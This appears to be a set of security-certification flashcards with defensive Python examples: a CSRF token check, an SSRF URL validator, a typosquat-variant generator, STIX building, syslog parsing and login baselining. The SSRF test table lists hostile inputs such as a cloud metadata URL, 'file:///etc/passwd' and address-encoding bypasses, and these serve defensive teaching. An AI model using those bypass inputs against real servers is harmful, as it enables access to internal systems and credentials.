  • An attacker causes a victim's browser to send a request to a web server the victim is logged in to; because the browser automatically attaches the victim's session cookie, the server trusts the request
  • The attacker only needs the victim's browser to load attacker-controlled content (a link, a hidden auto-submitting form, an image tag), not control of the browser; the request may be invisible to the victim
98
Q

How to protect against Cross-Site Request Forgery?

A
  • Developers should add anti-forgery techniques
  • Usually a cryptographic token, unique per session, that must accompany every state-changing request; an attacker's page cannot read the victim's token, so its forged request fails
  • Marking session cookies SameSite also stops most cross-site requests from carrying them
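The anti-forgery token from card 98 in its simplest form, as an added example (not part of the original flashcards): a per-session random token is embedded in the legitimate form and checked on every state-changing request with a constant-time comparison. The session object, form fields and handler are constructed for the demonstration; a real framework does the same thing behind a decorator:

```python
"""Synchronizer-token CSRF protection, minimal version.

The token is random, stored server-side with the session, and echoed in the
legitimate form.  An attacker's page on another origin can make the victim's
browser SEND a request with the victim's cookie, but cannot READ the
victim's page to learn the token, so a forged request arrives without it."""
import hmac
import secrets


class Session:
    """One logged-in user's server-side session state."""

    def __init__(self):
        self.id = secrets.token_hex(16)
        self.csrf_token = secrets.token_urlsafe(32)


def render_form(session: Session) -> str:
    """The legitimate page embeds the session's token in a hidden field."""
    return ('<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf" value="{session.csrf_token}">'
            '<input name="to"><input name="amount"></form>')


def handle_transfer(session: Session, form: dict):
    """The state-changing handler: reject unless the token matches.

    hmac.compare_digest keeps the comparison constant-time so the token
    cannot be recovered byte by byte from response timing."""
    submitted = form.get("csrf", "")
    if not hmac.compare_digest(submitted, session.csrf_token):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {form['amount']} to {form['to']}"


def legitimate_request(session: Session) -> dict:
    """What the real form submits: the token it was rendered with."""
    return {"csrf": session.csrf_token, "amount": "10", "to": "bob"}


def forged_request() -> dict:
    """What an attacker's hidden auto-submitting form can send.  The browser
    adds the session cookie on its own, but the token field is absent."""
    return {"amount": "10000", "to": "attacker"}


if __name__ == "__main__":
    s = Session()
    print(render_form(s))
    print(handle_transfer(s, legitimate_request(s)))
    print(handle_transfer(s, forged_request()))
```

Two things the token relies on: it must be unpredictable (hence `secrets`, not `random`), and the site must not have an XSS flaw, since a script running in the victim's origin could read the token and the protection collapses. That is the reason CSRF tokens and the XSS defenses in card 83 belong together.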
99
Q

Define

SSRF

A
  • Server-Side Request Forgery
  • An attack on a vulnerable web application
  • The attacker supplies a URL or hostname (for example in a "fetch this image" parameter) and the web server makes that request on the attacker's behalf
  • Gives the attacker whatever reach the web server itself has, such as internal network hosts or a cloud provider's metadata service, along with the responses
100
Q

How to protect against SSRF?

A
  • It is caused by bad programming. Ensure your application does not have these vulnerabilities
  • The server should validate user-supplied URLs against an allow list of schemes and destinations, refuse internal / private address ranges, and validate responses before returning them to the user
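The pre-fetch check from card 100, as an added example (not part of the original flashcards): a validator that admits only `http`/`https`, only allow-listed hostnames, and, for literal IP addresses, only globally routable ones, so loopback, private, link-local (including the cloud metadata address) and reserved ranges are refused. The allow list is an assumption; no network request is made:

```python
"""SSRF defense: validate a user-supplied URL before the server fetches it.

Policy: scheme must be http/https; a hostname must be on the allow list; a
literal IP must be globally routable (Python's ipaddress module already
classifies loopback, RFC 1918, link-local, documentation and reserved
ranges as not global)."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}   # assumed allow list


def is_safe_url(url: str) -> bool:
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False                        # file://, gopher://, ftp:// ...
    host = parts.hostname                   # userinfo and port already stripped
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not a literal address: names must be explicitly allow-listed.
        # This also rejects "localhost" and shorthand such as 127.1 or
        # 0x7f000001, which are not valid literals to ip_address().
        return host.lower() in ALLOWED_HOSTS
    # A literal address: refuse anything that is not globally routable
    # (127/8, 10/8, 172.16/12, 192.168/16, 169.254/16, ::1, fc00::/7 ...).
    return ip.is_global


# Constructed test URLs, including the usual bypass attempts.
CASES = {
    "https://images.example.com/a.png": True,
    "http://8.8.8.8/": True,
    "http://127.0.0.1:8080/admin": False,
    "http://169.254.169.254/latest/meta-data/": False,   # cloud metadata
    "http://10.0.0.5/": False,
    "http://[::1]/": False,
    "http://localhost/": False,
    "http://127.1/": False,
    "http://0x7f000001/": False,
    "http://images.example.com@127.0.0.1/": False,      # userinfo trick
    "file:///etc/passwd": False,
    "gopher://cdn.example.com/": False,
}


def check_all() -> dict:
    """Run the validator over the constructed cases; True means it agreed."""
    return {url: is_safe_url(url) == expected for url, expected in CASES.items()}


if __name__ == "__main__":
    for url, ok in check_all().items():
        print(f"{'ok ' if ok else 'BAD'} {url}")
```

Two caveats a practitioner would add. First, an allow-listed hostname is resolved at fetch time, so a DNS record the attacker controls (or DNS rebinding) can still point it at an internal address; resolve once, check the resulting IP with the same rules, and connect to that IP. Second, redirects must be followed through the same validator, since `https://cdn.example.com/x` can 302 to `http://169.254.169.254/`.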
101
Q

Define

Driver Manipulation

A
  • Drivers control the interaction between hardware and your OS, and are trusted by the OS (they typically run in the kernel)
  • If an attacker can exploit a vulnerability in a driver, or get a malicious driver installed, they can perform trusted actions
  • Hardware interactions often carry very sensitive information (webcam video, microphone audio, everything you type)
102
Q

Define

Application Compatibility Shim Cache

A
  • Part of the Windows Application Compatibility infrastructure, used for applications running in Compatibility Mode
  • A shim is a small compatibility layer that sits between a legacy application and the current operating system, translating the calls the old application makes into ones the current OS supports
  • The Shim Cache records which applications have been checked for compatibility and which fixes (shims) apply to them
  • (A physical "shim" is something that fills the space between two objects)
103
Q

Define

Shimming

A
  • Abusing the Application Compatibility framework: an attacker installs a malicious custom shim so that Windows applies it to a target program
  • The shim can inject code into the application or bypass security controls while looking like a legitimate compatibility fix
104
Q

Define

Refactoring

A
  • Malware that is made to appear as a different program every time it is downloaded
  • Can be done by reordering functions, adding random code strings and pointless instructions
  • This helps it avoid signature-based anti-virus / anti-malware detection
105
Q

What is this also known as? Metamorphic Malware

A
  • Another term for Refactoring
106
Q

How to protect against Refactoring?

A
  • Signature-based security will not be effective
  • Use a layered approach to security that looks at behavior
107
Q

What versions of SSL/TLS are deprecated, and what are current standards?

A
  • SSL 3.0 and prior (i.e. all versions of SSL) are deprecated
  • TLS 1.0 and 1.1 are deprecated
  • TLS 1.2 and 1.3 are both current standards
108
Q

Define

SSL Stripping

A
  • An on-path attack and a downgrade attack
  • The attacker sits between the victim and the server and modifies the data sent between them
  • If the server requires encryption, the attacker talks to the server over HTTPS but relays the pages to and from the victim over plain HTTP, rewriting HTTPS links to HTTP, so that they can see and modify all data
109
Q

Define

HTTP Downgrade

A
  • Another name for SSL Stripping
110
Q

How can an on-path attack be achieved?

A
  • The attacker may utilize a proxy server, ARP spoofing, a rogue Wi-Fi hotspot, etc.
111
Q

How to protect against SSL Stripping?

A
  • Both clients and servers must be updated
  • Require from the client side (such as in the browser) that all communication be HTTPS, not allowing HTTP to even be requested; HTTP Strict Transport Security (HSTS) tells the browser to do exactly this for a site, and browser preload lists apply it even to the first visit
  • Require from the server side not to serve content over plain HTTP, and require HTTPS
112
Q

Define

Race Condition

A
  • A programming flaw
  • Can occur when more than one thing is happening at the same time, especially when unexpected, and the order in which the operations complete causes unintended results
113
Q

Define

TOCTOU

A
  • Time-of-Check to Time-of-Use
  • An attack that takes advantage of a race condition
  • The attacker changes something (for example, swapping a file for a symbolic link) in the window between when a program checks a resource and when it uses it, so the program acts on altered data it believed it had validated
114
Q

How to protect against Race Conditions?

A
  • Careful programming that accounts for every possible ordering of events the program may encounter
  • Make the check and the use a single atomic operation (for example, open the file once and operate on the open handle rather than re-resolving the path), and use locks or transactions for shared state
115
Q

Define

Rogue Access Point

A
  • An unauthorized wireless access point
  • May or may not be malicious, but a security concern either way, since it can provide an unmonitored path into the network
116
Q

Define

802.1X

A
  • A form of (port-based) Network Access Control
  • Requires you to authenticate, typically against a RADIUS server, before the switch port or wireless association will pass traffic, regardless of the type of connection (wireless, Ethernet, etc.)
117
Q

How to protect against Rogue Access Points?

A
  • Schedule periodic site surveys
  • Evaluate the wireless spectrum for unknown SSIDs and access points
  • Use network access control (802.1X) so that even if an attacker did connect to the network through a rogue AP, they would still need to authenticate
118
Q

Define

Wireless Evil Twin

A
  • An attacker configures a rogue wireless access point to use the same (or a similar) SSID and security settings as the legitimate network
  • If well placed with a strong signal, it can even overpower the existing access points so that clients prefer it
119
Q

How to protect against Wireless Evil Twins?

A
  • Do not do sensitive work on open wireless networks
  • Use HTTPS
  • Use a VPN
120
Q

Define

Bluejacking

A
  • Sending unsolicited messages to another device via Bluetooth
  • Not typically a serious threat, since it's just a message, and it requires close physical proximity
  • Some devices and software may allow the message to include an image, contact card, or video
121
Q

Define

Bluesnarfing

A
  • Accessing data on a device over the Bluetooth channel without needing to authenticate
  • May include the contacts list, calendar, e-mail, photos, and other files on the device
  • The original vulnerability was patched in 2003; modern devices are not susceptible
  • If using an older Bluetooth device, it is a serious security concern
122
Q

Wireless Deauthentication is also known as?

A
  • Another name for a Wireless Disassociation Attack
123
Q

Define

Wireless Disassociation Attack

A
  • A DoS attack that causes wireless devices to be unable to communicate with the access point
  • Performed by sending spoofed deauthentication or disassociation management frames, which the client or AP honors
  • A flaw of the original 802.11 design, which sent management frames unauthenticated and unencrypted
  • Addressed by 802.11w (Protected Management Frames, 2009), which authenticates the important management frames; it is required in WPA3 but optional, and often not enabled, on WPA2 networks
124
Q

Define

Wireless Jamming

A
  • A form of radio frequency interference
  • A type of DoS attack to prevent wireless communication
  • Interference may be unintentional (microwave ovens, fluorescent lights); jamming is intentional
  • May be constant or intermittent, noise or data sent on the channel to overwhelm the legitimate signal
  • Requires close physical proximity to be effective
125
Q

Define

Reactive Jamming

A
  • A type of wireless jamming
  • The attacker only creates interference when someone else tries to communicate
  • May be targeting a specific individual device
126
Q

Define

Fox Hunting

A
  • Using a directional antenna and headphones to try to locate the source of a signal
  • Can be used to locate the source of wireless jamming or interference
127
Define RFID
* Radio Frequency Identification * Uses RADAR technology: Radio energy is transmitted to the tag, the RF powers the tag and an ID is transmitted back. * Usually unidirectional, but can actually be bi-directional * Some tag formats can be active/powered * Used everywhere: in access badges, pet identification, inventory, anything that needs to be tracked
128
What are some RFID security concerns?
* Data capture: view communication if sent in the clear * Decrypt communication: Many default keys of common device are publicly available. * Replay attack * Spoof the reader * DoS by signal jamming
129
Define NFC
* Near-Field Communication * A type of enhanced RFID * Bidirectional communication
130
What are some common applications of NFC?
* In-store payment systems to pay via mobile phone * Bluetooth can use NFC to bootstrap pairing process * Authentication card / access token
131
What are some NFC security concerns?
* Remote capture of data (NFC is its own wireless network) * Frequency jamming, DoS * Relay / Replay attack, on-path attack * Loss of device control (such as a lost/stolen phone)
132
Define Nonce
* In cryptography, a nonce is an arbitrary number used only once * From the term "for the nonce" meaning "for the time being" * A random or pseudo-random number, though it may also be a counter
133
Define IV
* Initialization Vector * A type of cryptographic nonce, added to the front of a cryptographic key * Often used in WEP, and some SSL implementations
134
What are examples of nonces?
* Initialization Vector * Salt
135
Define On-Path Attack
• Formerly known as man-in-the-middle • An attacker (for example, perhaps, a "man") might sit in-between (that is to say, in "the middle") of two communicating devices. (But we won't use those words, because that would be patriarchal) * The attacker intercepts and redirects your traffic without your knowledge. * They may merely read all the communication, or may modify it for malicious purposes.
136
Define ARP Poisoning
* Address Resolution Protocol Poisoning * A type of on-path attack * An attacker sends false ARP response messages to devices that it wants to poison. This may allow it to impersonate various devices. * The attack must be on the LAN to perform
137
Define ARP
* Address Resolution Protocol * Protocol used for devices to track and match IP addresses to MAC addresses in their ARP Cache. * ARP as a protocol has no security built into it. Devices make and receive modifications to ARP tables without any authentication or encryption.
138
Define On-Path Browser Attack
* A type of on-path attack where the "man in the middle" is on the victim's own device * Malware runs in the browser to perform the interception and redirection.
139
Define MAC Flooding
* Attack sends traffic with so many different source MAC addresses that it fills a switch's MAC Table and overwrites all legitimate MAC addresses on the network. * Every switch has a limit to how many addresses it can store in its MAC table, and when it gets full, it will recognize that and start flooding traffic to all interfaces since it can no longer track destinations * Effectively turning a switch into a hub - all traffic is transmitted to all interfaces * This gives an attacker the opportunity to capture all network traffic
140
How to protect against MAC Flooding?
* Most switches have security features to detect MAC flooding. * The switch can restrict how many MAC addresses can come in from a single interface
141
Define MAC Cloning
* An attacker changes their MAC address to match that of an existing device * May be used to circumvent MAC filters * Or, may be used to create a DoS, as traffic for the legitimate MAC address will be disrupted
142
Another name for MAC Cloning?
MAC Spoofing
143
How to protect against MAC Cloning?
• Most modern switches have security features that look out for it and prevent it from disrupting the network.
144
Define DNS Poisoning
• Modify DNS records so that traffic is redirected Can be achieved by: * modifying a device's hosts file * sending a fake response to a valid DNS request * gaining access to the DNS server and modifying records
145
Define Domain Hijacking
* Gaining access to domain registration, allowing you to control traffic flows for the domain * May be achieved by brute force, social engineering, gaining access to e-mail address of account manager, etc.
146
Define URL Hijacking
• Registering domains that are slight variations or common misspellings of legitimate domain names
Could be used for purposes of:
- Showing ads
- A phishing site made to appear as the legitimate site
- Redirecting to a competitor's site
- Selling the hijacked domain to the legitimate domain's owner
- Infecting computers with a drive-by download
147
Define Brandjacking
- Another term for typosquatting
- A type of URL hijack, taking advantage of a common misspelling of a brand's domain name
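Defenders deal with URL hijacking and typosquatting by generating the likely variants of their own domain, registering the worst ones and watching DNS and certificate-transparency logs for the rest. Here is an added example (not from the flashcards) of such a generator; the keyboard-adjacency and look-alike tables are constructed assumptions, and only the last label is treated as the suffix.

```python
"""Generate the typosquatting / URL-hijacking variants of a domain
(added example, not from the flashcards). Defenders use such a list to
register the worst variants themselves and to watch DNS and certificate
logs for the rest.
"""

# Neighbouring keys on a US QWERTY layout (letters only; constructed table).
ADJACENT_KEYS = {
    "q": "wa", "w": "qase", "e": "wsdr", "r": "edft", "t": "rfgy", "y": "tghu",
    "u": "yhji", "i": "ujko", "o": "iklp", "p": "ol", "a": "qwsz", "s": "awedxz",
    "d": "serfcx", "f": "drtgvc", "g": "ftyhbv", "h": "gyujnb", "j": "huikmn",
    "k": "jiolm", "l": "kop", "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb",
    "b": "vghn", "n": "bhjm", "m": "njk",
}
# Characters or pairs that look alike at a glance (constructed table).
HOMOGLYPHS = {"o": ["0"], "l": ["1", "i"], "i": ["l", "1"], "e": ["3"],
              "a": ["4"], "s": ["5"], "m": ["rn"], "w": ["vv"], "g": ["q"]}


def typosquat_candidates(domain):
    """Return a sorted list of look-alike domains (the original excluded).
    Only the final label is treated as the suffix, so 'example.co.uk'
    is mutated in 'example.co'."""
    name, tld = domain.lower().rsplit(".", 1)
    out = set()
    for i, ch in enumerate(name):
        out.add(name[:i] + name[i + 1:])                 # omission: exampe
        out.add(name[:i] + ch + name[i:])                # repetition: exaample
        if i + 1 < len(name):                            # transposition: exmaple
            out.add(name[:i] + name[i + 1] + ch + name[i + 2:])
        for key in ADJACENT_KEYS.get(ch, ""):            # fat finger: ezample
            out.add(name[:i] + key + name[i + 1:])
        for glyph in HOMOGLYPHS.get(ch, []):             # look-alike: examp1e, exarnple
            out.add(name[:i] + glyph + name[i + 1:])
    for i in range(1, len(name)):                        # hyphenation: ex-ample
        out.add(name[:i] + "-" + name[i:])
    out.add("www" + name)                                # missing dot: wwwexample
    out.discard(name)
    return sorted(f"{n}.{tld}" for n in out if n)


if __name__ == "__main__":
    candidates = typosquat_candidates("example.com")
    print(len(candidates), "candidates, e.g.", candidates[:10])
```

Pair the list with a periodic WHOIS/DNS lookup: a candidate that suddenly resolves, or gets a TLS certificate issued, is the signal that someone else registered it.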
148
Define Domain Reputation
- ISPs, search engines, and e-mail providers track the reputation of domains
- If a domain receives too many reports of spam or malicious activity, it may be added to a blacklist
- Being blacklisted may result in all e-mail from that domain being marked as spam or rejected, or in the browser warning the user (or blocking the page) before they visit the site
149
List examples of "Unintentional DoS"
- Accidentally creating a network loop (without STP enabled)
- Using more bandwidth than the network can handle
- A water line breaking and damaging equipment
- Power outage
150
Define OT
- Operational Technology
- The hardware and software used to monitor and control industrial equipment
- Ex. electric grids, traffic control, manufacturing plants
151
What is unique about security for OT?
- It requires a much more critical security posture
- Must be strictly segmented from IT networks and protected
- Failures can result in catastrophic physical events, not just data loss
152
Define Amplified DDoS
- Uses reflection and spoofing techniques to turn a small amount of attacker traffic into a much larger flood at the victim
- For example, the attacker spoofs the victim web server's IP address as the source and sends a small request to a third-party server (the reflector) whose response is much larger than the request. The response goes to the victim, since their address was spoofed
- Thus the attacker only sent small amounts of traffic but used a third party to send much larger traffic to the victim; the ratio of response size to request size is the amplification factor
153
What is a malicious PowerShell script best-suited to attack?
- Windows systems
- Active Directory administration
- File share access
154
What is a malicious Python script best-suited to attack?
- Cloud-based systems
- Infrastructure such as routers, servers, switches
- When a single script needs to target a variety of OS types (works on Windows, macOS, and Linux)
155
What is a malicious Shell script best-suited to attack?
- Linux/Unix environments
- Web servers, databases, hypervisors
156
What is a malicious Macro script best-suited to attack?
- Users who can be fooled into opening the file that contains it and enabling the macro
- Since the macro runs in a familiar program, such as Word or Excel, it may be easier to fool a user
- Since Microsoft Office macros use VBA, the macro can run commands on the Windows OS
157
Define Semi-Authorized Hacker
- A hacker who is not formally authorized, but finds a vulnerability and does not use it
- May be working for research purposes or to help expose the vulnerability so it can be patched
158
Define OSINT
- Open-Source Intelligence
- Information gathered from publicly available sources, such as discussion groups on the Internet or government hearings and reports
159
Define CVE
- "Common Vulnerabilities and Exposures"
- A publicly available list of disclosed vulnerabilities, each with a unique ID of the form CVE-YYYY-NNNN (four or more digits)
- A community-managed list, maintained by MITRE
- Sponsored by CISA (part of DHS)
160
Define DHS
U.S. Department of Homeland Security
161
Define CISA
Cybersecurity and Infrastructure Security Agency
162
Define NVD
- "US National Vulnerability Database"
- Maintained by NIST; a summary of CVEs
- Provides additional details over the CVE list, such as patch availability and severity scoring (CVSS)
- Sponsored by DHS and CISA
163
Define AIS
- "Automated Indicator Sharing"
- A CISA program for automated, machine-to-machine sharing of threat indicators freely and efficiently between government and the private sector
- Built on the STIX and TAXII standards
164
Define STIX
- "Structured Threat Information Expression"
- Part of the standards used by AIS
- Standardized format (JSON in STIX 2.x) for describing cyber threat information
- Includes motivations, abilities, capabilities, and response information
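To show what a STIX object actually looks like, here is an added example (not from the flashcards, and not using any STIX library) that builds STIX 2.1 Indicator objects and a Bundle with the standard library and checks the properties the specification requires. The hash, domain and timestamps are constructed values, not real indicators.

```python
"""Build and sanity-check STIX 2.1 Indicator objects and a Bundle
(added example, not from the flashcards). Uses only the standard library;
the hash and domain values are constructed, not real IOCs.
"""
import json
import uuid
from datetime import datetime, timezone

# Properties STIX 2.1 requires on every Indicator (plus common ones on all SDOs).
REQUIRED_INDICATOR_PROPS = ("type", "spec_version", "id", "created", "modified",
                            "pattern", "pattern_type", "valid_from")


def stix_timestamp(dt=None):
    """STIX timestamps are RFC 3339 in UTC with a 'Z' suffix."""
    dt = dt or datetime.now(timezone.utc)
    return dt.strftime("%Y-%m-%dT%H:%M:%S.") + f"{dt.microsecond // 1000:03d}Z"


def sha256_pattern(hex_digest):
    """STIX pattern matching a file by SHA-256 hash."""
    return f"[file:hashes.'SHA-256' = '{hex_digest}']"


def domain_pattern(domain):
    """STIX pattern matching a domain name observation."""
    return f"[domain-name:value = '{domain}']"


def make_indicator(pattern, name, description, indicator_types=("malicious-activity",), when=None):
    ts = stix_timestamp(when)
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",   # STIX domain objects use UUIDv4 ids
        "created": ts,
        "modified": ts,
        "name": name,
        "description": description,
        "indicator_types": list(indicator_types),
        "pattern": pattern,
        "pattern_type": "stix",
        "valid_from": ts,
    }


def make_bundle(objects):
    """A Bundle is the container TAXII collections exchange."""
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": list(objects)}


def validate_indicator(obj):
    """Return a list of problems (empty means the object passes these checks)."""
    problems = [f"missing {p}" for p in REQUIRED_INDICATOR_PROPS if p not in obj]
    if obj.get("type") != "indicator":
        problems.append("type must be 'indicator'")
    if not str(obj.get("id", "")).startswith("indicator--"):
        problems.append("id must start with 'indicator--'")
    pattern = obj.get("pattern", "")
    if obj.get("pattern_type") == "stix" and not (pattern.startswith("[") and pattern.endswith("]")):
        problems.append("stix patterns are enclosed in square brackets")
    return problems


def example_bundle():
    """Deterministic sample: fixed timestamp, constructed hash and domain."""
    when = datetime(2024, 3, 11, 22, 14, 15, 3000, tzinfo=timezone.utc)
    return make_bundle([
        make_indicator(sha256_pattern("0123456789abcdef" * 4), "Dropper hash",
                       "SHA-256 of a constructed sample", when=when),
        make_indicator(domain_pattern("evil.example"), "C2 domain",
                       "constructed command-and-control domain", when=when),
    ])


if __name__ == "__main__":
    print(json.dumps(example_bundle(), indent=2))
```

The `pattern` string is the part a SIEM or EDR actually acts on; everything else is metadata that lets the receiver decide whether to trust and how long to keep the indicator (`valid_from`, and `valid_until` when present).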
165
Define TAXII
- "Trusted Automated Exchange of Indicator Information"
- Part of the standards used by AIS
- Standard transport protocol (an HTTPS-based API) for communicating / transferring STIX data
- Securely shares STIX data between servers and clients
166
Define IOC
- Indicator(s) of Compromise
- An observable artifact or event that indicates an intrusion has occurred or is in progress
167
List six examples of IOCs
- Unusual amount of network activity
- Change to file hash values
- Irregular international traffic
- Changes to DNS data
- Uncommon login patterns, such as time of day
- Spikes of read requests to certain files
168
What does this stand for: NIST
"National Institute of Standards and Technology"
169
Define Vulnerability Feed
• Various sources that publish information on vulnerabilities
Includes:
- National Vulnerability Database
- CVE data feeds
- Third-party feeds
170
Define RFC
- "Request for Comments"
- A type of online document, usually containing standards or methods for doing a particular task, but technically it may contain any number of things
- A way to track and formalize standards that anyone on the Internet can use
- Published by the ISOC, and often written by the IETF
171
Define ISOC
- "Internet Society"
- Publishes RFCs
172
Define IETF
- "Internet Engineering Task Force"
- One of the most common authors of RFCs
173
Define TTP
- "Tactics, Techniques, and Procedures"
- The methods that attackers use to gain access, and what they do once they have access
- Having more information on a TTP will aid in preventing and recognizing the attack
174
Define Zero-Day Attack
- An attack that leverages a vulnerability that has, before now, never been detected, published, or patched
- Due to this, there is usually no patch or prevention immediately available for the attack
- Becoming increasingly common
175
Define Open Permissions
- Technical name for a vulnerability caused by not applying proper access controls to data or systems
- Increasingly common with cloud storage (e.g. a storage bucket left readable by anyone)
176
Define Intelligence Fusion
• Process of gathering large volumes of data of different types from different sources and teams, and combining it into one large data set so that big-data analytics can be used to find threats
177
Define Non-Intrusive Scan
- A type of vulnerability scan
- The scan gathers information (versions, banners, configuration) but does not try to exploit any vulnerability
178
Define Intrusive Scan
- A type of vulnerability scan
- Attempts to exploit vulnerabilities to confirm they are real, which can disrupt the target
- Closer to penetration testing
179
Define Non-credentialed Scan
- A type of vulnerability scan
- The scanner does not have login information, simulating an outside attacker
180
Define Credentialed Scan
- A type of vulnerability scan
- The scanner emulates an insider attack, using the credentials of a user, so it can inspect the system from the inside (installed software, patch level, configuration)
181
Define CVSS
- "Common Vulnerability Scoring System"
- Scores a vulnerability from 0 to 10 (higher is more severe)
- Scoring standards change over time; there are different versions (e.g. CVSS v2, v3.x)
- Scores are published in the NVD
182
Define SIEM
- "Security Information and Event Management"
- Aggregates logs and alerts from multiple systems
- Stores them long-term, which can require an extremely high amount of storage space
- Usually includes advanced reporting features and data correlation
183
Define Syslog
- A standard format and protocol for message logging
- Allows a variety of systems to send their logs to one consolidated collector
- Used to feed SIEMs
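The first thing a SIEM does with a syslog line is split it into fields it can index. As an added example (not from the flashcards, and not any SIEM's own code), here is a parser for both wire formats in use, RFC 5424 and the older BSD/RFC 3164 style; the sample lines are constructed.

```python
"""Parse syslog lines in both common wire formats, RFC 5424 and the older
BSD/RFC 3164 style, into the fields a SIEM would index
(added example, not from the flashcards; sample lines are constructed).
"""
import re

FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news",
              "uucp", "cron", "authpriv", "ftp", "ntp", "security", "console",
              "solaris-cron", "local0", "local1", "local2", "local3", "local4",
              "local5", "local6", "local7"]
SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]

PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.S)
# RFC 5424: VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID then SD [+ MSG]
RFC5424_RE = re.compile(r"^(\d) (\S+) (\S+) (\S+) (\S+) (\S+) (.*)$", re.S)
# RFC 3164: "Mmm dd hh:mm:ss HOST TAG[pid]: MSG"
RFC3164_RE = re.compile(
    r"^([A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) ([^:\s\[]+)(?:\[(\d+)\])?: ?(.*)$", re.S)
SD_PARAM_RE = re.compile(r'(\S+?)="((?:[^"\\]|\\.)*)"')

SAMPLE_LINES = [
    '<34>1 2024-03-11T22:14:15.003Z fw01.example.net sshd 1203 ID47 '
    '[auth@32473 user="root" src="198.51.100.7"] Failed password for root',
    "<13>Mar 11 22:14:16 web01 nginx[812]: 198.51.100.7 - GET /admin 403",
]


def _nil(value):
    return None if value == "-" else value


def _parse_structured_data(text):
    """Parse the STRUCTURED-DATA element(s) at the start of text.
    Returns ({sd_id: {param: value}}, remaining MSG)."""
    if text.startswith("-"):
        return {}, text[1:].lstrip()
    sd, pos = {}, 0
    while pos < len(text) and text[pos] == "[":
        end = pos + 1
        while end < len(text) and not (text[end] == "]" and text[end - 1] != "\\"):
            end += 1
        sd_id, _, params = text[pos + 1:end].partition(" ")
        sd[sd_id] = {k: v.replace('\\"', '"').replace("\\]", "]").replace("\\\\", "\\")
                     for k, v in SD_PARAM_RE.findall(params)}
        pos = end + 1
    return sd, text[pos:].lstrip()


def parse_syslog(line):
    """Return a dict of indexed fields, or raise ValueError on an unknown format."""
    m = PRI_RE.match(line)
    if not m:
        raise ValueError("missing <PRI> header")
    pri, rest = int(m.group(1)), m.group(2)
    facility, severity = pri // 8, pri % 8       # PRI = facility * 8 + severity
    record = {
        "facility": facility, "severity": severity,
        "facility_name": FACILITIES[facility] if facility < len(FACILITIES) else str(facility),
        "severity_name": SEVERITIES[severity],
    }
    m = RFC5424_RE.match(rest)
    if m:
        sd, msg = _parse_structured_data(m.group(7))
        record.update(version=int(m.group(1)), timestamp=_nil(m.group(2)), host=_nil(m.group(3)),
                      app=_nil(m.group(4)), procid=_nil(m.group(5)), msgid=_nil(m.group(6)),
                      sd=sd, msg=msg)
        return record
    m = RFC3164_RE.match(rest)
    if m:
        record.update(version=0, timestamp=m.group(1), host=m.group(2), app=m.group(3),
                      procid=m.group(4), msgid=None, sd={}, msg=m.group(5))
        return record
    raise ValueError("unrecognised syslog format")


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(parse_syslog(line))
```

Two practitioner caveats: the RFC 3164 timestamp has no year or time zone, so the collector must add both on receipt, and neither format authenticates the sender, so a host that can reach UDP/514 can forge entries under any hostname unless you use TLS transport (RFC 5425) or a per-host collector.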
184
Define UEBA
- "User and Entity Behavior Analytics"
- Builds a baseline of how users and devices normally behave and looks for deviations that may indicate compromise
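The "uncommon login patterns, such as time of day" IOC from the list above is exactly the kind of thing UEBA baselining catches. Here is an added example (not from the flashcards, and far simpler than a real UEBA product) that learns each user's usual login hours and source countries from history and flags new events that fall outside them. All events are constructed; the one-hour slack is an assumption.

```python
"""Time-of-day and source-country login baseline, a toy of what UEBA does
and of the "uncommon login patterns" IOC (added example, not from the flashcards).
Events are constructed: (user, ISO timestamp, source country).
"""
from collections import defaultdict
from datetime import datetime

HISTORY = [
    ("alice", "2024-03-04T08:55:00", "DE"), ("alice", "2024-03-05T09:10:00", "DE"),
    ("alice", "2024-03-06T17:40:00", "DE"), ("alice", "2024-03-07T09:02:00", "DE"),
    ("bob", "2024-03-04T13:15:00", "DE"), ("bob", "2024-03-05T14:05:00", "DE"),
]
NEW_EVENTS = [
    ("alice", "2024-03-11T03:12:00", "DE"),  # 3 am: far outside alice's hours
    ("alice", "2024-03-11T09:02:00", "BR"),  # usual hour, never-seen country
    ("alice", "2024-03-11T18:20:00", "DE"),  # within one hour of the 17:40 baseline
    ("bob", "2024-03-11T14:00:00", "DE"),    # normal
    ("carol", "2024-03-11T10:00:00", "DE"),  # no history at all
]


def build_baseline(history):
    """Per user: the set of hours-of-day and the set of countries seen."""
    hours, countries = defaultdict(set), defaultdict(set)
    for user, ts, country in history:
        hours[user].add(datetime.fromisoformat(ts).hour)
        countries[user].add(country)
    return {"hours": dict(hours), "countries": dict(countries)}


def _hour_distance(a, b):
    d = abs(a - b)
    return min(d, 24 - d)   # 23:00 and 00:00 are one hour apart, not 23


def unusual_logins(baseline, events, slack_hours=1):
    """Return (user, timestamp, reason) for each event outside the baseline."""
    findings = []
    for user, ts, country in events:
        if user not in baseline["hours"]:
            findings.append((user, ts, "no baseline for user"))
            continue
        hour = datetime.fromisoformat(ts).hour
        if all(_hour_distance(hour, h) > slack_hours for h in baseline["hours"][user]):
            findings.append((user, ts, f"login at hour {hour:02d} outside usual hours"))
        if country not in baseline["countries"][user]:
            findings.append((user, ts, f"login from {country} never seen before"))
    return findings


if __name__ == "__main__":
    for finding in unusual_logins(build_baseline(HISTORY), NEW_EVENTS):
        print(finding)
```

A baseline built from too little history (carol, or alice's single evening login) produces noise, which is why real systems weight by frequency and let the baseline age rather than treating every seen value as equally normal.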
185
Define Sentiment Analysis
- Analyzes public opinion and discourse (social media, forums, news) to determine potential threats
- A well-known and much disliked organization is more likely to get attacked
186
Define SOAR
- "Security Orchestration, Automation, and Response"
